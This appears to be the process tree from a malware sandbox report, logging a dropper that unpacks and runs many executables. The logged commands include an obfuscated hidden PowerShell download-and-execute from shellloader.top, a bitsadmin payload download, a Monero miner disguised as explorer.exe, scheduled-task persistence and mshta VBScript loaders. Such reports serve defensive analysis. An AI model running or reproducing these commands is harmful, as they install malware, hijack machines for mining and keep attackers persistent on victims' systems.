C:\Windows\system32\cmd.exe /c Fri15364050134.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4268

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15364050134.exe
Fri15364050134.exe
5⤵
- Executes dropped EXE
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15d3a9f0cbde1.exe
4⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15d3a9f0cbde1.exe
Fri15d3a9f0cbde1.exe
5⤵
- Executes dropped EXE
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri156c10dd46.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:528

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri156c10dd46.exe
Fri156c10dd46.exe
5⤵
- Executes dropped EXE
PID:1468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri158ea592d6f.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri158ea592d6f.exe
Fri158ea592d6f.exe
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri155e6d4468.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3300

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri155e6d4468.exe
Fri155e6d4468.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:1080

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
7⤵
- Executes dropped EXE
PID:1808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
8⤵
PID:5952

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
9⤵
- Creates scheduled task(s)
PID:5684

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
8⤵
- Executes dropped EXE
PID:2588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
9⤵
PID:6472

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
10⤵
- Creates scheduled task(s)
PID:7704

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
9⤵
PID:7028

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
9⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\ProgramData\5449410.exe
"C:\ProgramData\5449410.exe"
8⤵
- Executes dropped EXE
PID:600

C:\ProgramData\3421873.exe
"C:\ProgramData\3421873.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1372

C:\ProgramData\7955302.exe
"C:\ProgramData\7955302.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\ProgramData\6878127.exe
"C:\ProgramData\6878127.exe"
8⤵
- Executes dropped EXE
PID:5556

C:\ProgramData\1831462.exe
"C:\ProgramData\1831462.exe"
8⤵
PID:5048

C:\ProgramData\7325211.exe
"C:\ProgramData\7325211.exe"
8⤵
PID:6292

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:4340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
8⤵
PID:5504

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
9⤵
- Kills process with taskkill
PID:4268

C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
7⤵
- Executes dropped EXE
PID:4836

C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
7⤵
PID:932

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5280

C:\Windows\SysWOW64\cmd.exe
"cmd" /c cmd < Essendosi.dot
9⤵
PID:5500

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:5824

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^MownSQgCPuLHWmIqWzHUkrmFXfwqDzhgFgBiLScpipcbLfwKQhZKSNxIJcADPhYvTvwIXAftYbMeHwUIgsldzCvSTSnfaRxTlZEfgaMdXVMxqawIBRfbrIedqpO$" Trasporta.dot
11⤵
PID:5740

C:\Users\Admin\AppData\Roaming\Lei.exe.com
Lei.exe.com R
11⤵
PID:6452

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
12⤵
PID:7024

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
13⤵
PID:7320

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
14⤵
PID:7872

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
15⤵
PID:4320

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
16⤵
PID:8024

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
17⤵
PID:5656

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
18⤵
PID:8036

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
19⤵
PID:7624

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
20⤵
PID:4812

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
21⤵
PID:6772

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
22⤵
PID:6236

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
23⤵
PID:4148

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
24⤵
PID:7204

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
25⤵
- Executes dropped EXE
- Adds Run key to start application
PID:724

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
26⤵
PID:4988

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
27⤵
PID:664

C:\Users\Admin\AppData\Roaming\Lei.exe.com
C:\Users\Admin\AppData\Roaming\Lei.exe.com R
28⤵
PID:7424

C:\Windows\SysWOW64\PING.EXE
ping localhost
11⤵
- Checks SCSI registry key(s)
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2940

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3280

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
8⤵
- Checks whether UAC is enabled
PID:2512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
9⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
10⤵
PID:4320

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
11⤵
- Checks whether UAC is enabled
PID:5964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
12⤵
PID:5108

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
11⤵
PID:6792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
13⤵
PID:6420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
13⤵
PID:6384

C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
13⤵
PID:4148

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
14⤵
PID:6772

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
15⤵
PID:7880

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
16⤵
PID:8004

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
10⤵
- Kills process with taskkill
PID:2440

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1712 -s 1544
8⤵
- Program crash
PID:2244

C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe
"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe"
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4480

C:\Users\Admin\AppData\Local\Temp\tmpD2B2_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpD2B2_tmp.exe"
8⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\tmpD2B2_tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmpD2B2_tmp.exe
9⤵
PID:3900

C:\Users\Admin\AppData\Local\Temp\tmpD2B2_tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmpD2B2_tmp.exe
9⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
7⤵
- Executes dropped EXE
PID:5196

C:\Users\Admin\AppData\Local\Temp\is-E83VT.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E83VT.tmp\setup_2.tmp" /SL5="$202D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5412

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
9⤵
- Executes dropped EXE
PID:5676

C:\Users\Admin\AppData\Local\Temp\is-UOQL2.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UOQL2.tmp\setup_2.tmp" /SL5="$20312,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5792

C:\Users\Admin\AppData\Local\Temp\is-5FIVH.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-5FIVH.tmp\postback.exe" ss1
11⤵
- Executes dropped EXE
PID:3344

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:6308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
13⤵
PID:6564

C:\Users\Admin\AppData\Local\Temp\9uvHJnM6b.exe
"C:\Users\Admin\AppData\Local\Temp\9uvHJnM6b.exe"
12⤵
PID:6632

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9uvHJnM6b.exe"
13⤵
PID:7104

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
14⤵
- Delays execution with timeout.exe
PID:7604

C:\Users\Admin\AppData\Local\Temp\tingwang-game.exe
"C:\Users\Admin\AppData\Local\Temp\tingwang-game.exe"
7⤵
- Executes dropped EXE
PID:5296

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
7⤵
- Executes dropped EXE
PID:5388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15c8bd2ae6f94f.exe
4⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15c8bd2ae6f94f.exe
Fri15c8bd2ae6f94f.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1520f78358.exe
4⤵
PID:356

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri1520f78358.exe
Fri1520f78358.exe
5⤵
- Executes dropped EXE
PID:2388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri157e966e73fe.exe
4⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri157e966e73fe.exe
Fri157e966e73fe.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Users\Admin\AppData\Roaming\2349725.scr
"C:\Users\Admin\AppData\Roaming\2349725.scr" /S
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376

C:\Users\Admin\AppData\Roaming\3440913.scr
"C:\Users\Admin\AppData\Roaming\3440913.scr" /S
6⤵
PID:724

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
- Executes dropped EXE
PID:3480

C:\Users\Admin\AppData\Roaming\1443888.scr
"C:\Users\Admin\AppData\Roaming\1443888.scr" /S
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:492

C:\Users\Admin\AppData\Roaming\8423436.scr
"C:\Users\Admin\AppData\Roaming\8423436.scr" /S
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1884

C:\Users\Admin\AppData\Roaming\1845761.scr
"C:\Users\Admin\AppData\Roaming\1845761.scr" /S
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1586c2482e5c8a45.exe
4⤵
PID:868

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri1586c2482e5c8a45.exe
Fri1586c2482e5c8a45.exe
5⤵
- Executes dropped EXE
PID:2940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15c47a7c807b12d1.exe
4⤵
PID:4216

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15c47a7c807b12d1.exe
Fri15c47a7c807b12d1.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2476

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15c47a7c807b12d1.exe
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15c47a7c807b12d1.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1503acc0996b574.exe
4⤵
PID:1072

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri1503acc0996b574.exe
Fri1503acc0996b574.exe
5⤵
- Executes dropped EXE
PID:3876

C:\Users\Admin\AppData\Local\Temp\is-QJQSJ.tmp\Fri1503acc0996b574.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QJQSJ.tmp\Fri1503acc0996b574.tmp" /SL5="$80208,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri1503acc0996b574.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:2688

C:\Users\Admin\AppData\Local\Temp\is-IHTB8.tmp\EtalevzaJet.exe
"C:\Users\Admin\AppData\Local\Temp\is-IHTB8.tmp\EtalevzaJet.exe" /S /UID=burnerch2
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3788

C:\Program Files\Common Files\ADRPUCHWSB\ultramediaburner.exe
"C:\Program Files\Common Files\ADRPUCHWSB\ultramediaburner.exe" /VERYSILENT
8⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\is-QAG8Q.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QAG8Q.tmp\ultramediaburner.tmp" /SL5="$20392,281924,62464,C:\Program Files\Common Files\ADRPUCHWSB\ultramediaburner.exe" /VERYSILENT
9⤵
PID:6244

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\3a-44d5f-db3-c0196-87da8d1c2a307\Paebagetily.exe
"C:\Users\Admin\AppData\Local\Temp\3a-44d5f-db3-c0196-87da8d1c2a307\Paebagetily.exe"
8⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\d0-bb1a6-b02-a55a8-002d412599783\Buwytidunu.exe
"C:\Users\Admin\AppData\Local\Temp\d0-bb1a6-b02-a55a8-002d412599783\Buwytidunu.exe"
8⤵
PID:6224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fmbplouv.rtx\GcleanerEU.exe /eufive & exit
9⤵
PID:7232

C:\Users\Admin\AppData\Local\Temp\fmbplouv.rtx\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\fmbplouv.rtx\GcleanerEU.exe /eufive
10⤵
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 652
11⤵
- Program crash
PID:7768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 664
11⤵
- Program crash
PID:7184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 496
11⤵
- Program crash
PID:7304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 732
11⤵
- Program crash
PID:7704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 916
11⤵
- Program crash
PID:7716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 860
11⤵
- Program crash
PID:7624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 764
11⤵
- Program crash
PID:6156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1xkzsp0.xjz\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:7448

C:\Users\Admin\AppData\Local\Temp\v1xkzsp0.xjz\installer.exe
C:\Users\Admin\AppData\Local\Temp\v1xkzsp0.xjz\installer.exe /qn CAMPAIGN="654"
10⤵
PID:6808

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\v1xkzsp0.xjz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\v1xkzsp0.xjz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632667480 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
11⤵
PID:2828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zsbruclz.vca\any.exe & exit
9⤵
PID:7588

C:\Users\Admin\AppData\Local\Temp\zsbruclz.vca\any.exe
C:\Users\Admin\AppData\Local\Temp\zsbruclz.vca\any.exe
10⤵
PID:5944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v2vpktww.m3i\askinstall52.exe & exit
9⤵
PID:7820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jtnjrbs.bnj\gcleaner.exe /mixfive & exit
9⤵
PID:7960

C:\Users\Admin\AppData\Local\Temp\5jtnjrbs.bnj\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\5jtnjrbs.bnj\gcleaner.exe /mixfive
10⤵
PID:6148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 652
11⤵
- Program crash
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 668
11⤵
- Program crash
PID:7184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 672
11⤵
- Program crash
PID:8096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 816
11⤵
- Program crash
PID:7704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 908
11⤵
- Program crash
PID:3844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 932
11⤵
- Program crash
PID:3316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 972
11⤵
- Program crash
PID:6880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmd1skdb.hgp\autosubplayer.exe /S & exit
9⤵
PID:7192

C:\Users\Admin\AppData\Local\Temp\tmd1skdb.hgp\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\tmd1skdb.hgp\autosubplayer.exe /S
10⤵
PID:7328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:1900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:6916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:7840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:7584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:6420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:6796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCDFD.tmp\tempfile.ps1"
11⤵
PID:7968

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
11⤵
- Download via BitsAdmin
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15517df7a88264b6.exe
4⤵
PID:1256

